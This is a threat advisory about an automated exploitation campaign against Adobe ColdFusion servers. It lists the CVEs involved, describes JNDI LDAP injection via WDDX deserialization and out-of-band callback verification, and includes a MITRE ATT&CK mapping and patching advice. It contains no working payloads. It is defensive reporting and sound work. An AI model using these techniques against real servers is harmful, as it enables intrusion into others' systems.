EXECUTIVE SUMMARY:
A widespread exploitation campaign was observed targeting Adobe ColdFusion servers during a period of likely reduced monitoring, leveraging a broad cluster of known vulnerabilities to probe and compromise exposed systems. The activity focused on weaknesses including CVE‑2016‑6195, CVE‑2002‑1131,CVE‑2013‑2251, CVE‑2013‑2134, CVE‑2010‑2035, CVE‑2022‑47945, CVE‑2018‑11776, CVE‑2023‑26359, CVE‑2023‑38205, CVE‑2023‑44353, CVE‑2023‑38203, CVE‑2023‑38204, CVE‑2023‑29298, CVE‑2023‑29300, CVE‑2023‑26347 and CVE‑2023‑44352, indicating systematic abuse of both legacy and recently disclosed flaws. The exploitation activity was concentrated around major holiday downtime and appears to be part of a larger, automated initial access broker operation that scans and exploits exposed web application platforms on a scale. The campaign further employed coordinated callback mechanisms to validate successful vulnerability triggers, enabling rapid confirmation of compromised infrastructure.
Threat activity originated primarily from a pair of infrastructure hosts that generated thousands of requests against ColdFusion instances, cycling through more than ten distinct vulnerabilities from recent ColdFusion advisories. The exploitation leveraged JNDI LDAP injection via WDDX deserialization, enabling out-of-band callback verification through OAST domains to confirm exploit execution. Payloads included remote code execution vectors, local file inclusion attempts, arbitrary file read operations, and gadget chain triggers, with most callbacks using structured Interactsh domains to track responses. Targeting was global in scope, with traffic directed at systems in multiple countries and evidence of secondary actors contributing minimal additional requests. Indicators such as JA4 network fingerprints and a large set of unique callback domains further characterize the automated nature of the scanning and exploitation traffic.
This campaign underscores the ongoing risk posed by unpatched application servers like ColdFusion and the value of proactive monitoring and patch management. Organizations running ColdFusion should ensure that all relevant security updates for known vulnerabilities are applied and that effective network and application protections are in place to detect and block both scanning and exploitation attempts. Additionally, defenders should consider enrichment of detection rules for deserialization and JNDI-based vectors, incorporate indicators such as malicious callback domains and offending IPs into boundary defenses, and continuously audit for unexpected out-of-band interactions indicative of successful compromise.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1190 | Exploit Public‑Facing Application | — |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| T1203 | Exploitation for Client Execution | — | |
| Persistence | T1133 | External Remote Services | — |
| T1505.003 | Server Software Component | Web Shell | |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials in Files |
| Discovery | T1083 | File and Directory Discovery | — |
| T1046 | Network Service Discovery | — | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1090.003 | Proxy | Multi-hop Proxy | |
| Impact | T1499.003 | Endpoint Denial of Service | Application Exhaustion Flood |
REFERENCES:
The following reports contain further technical details: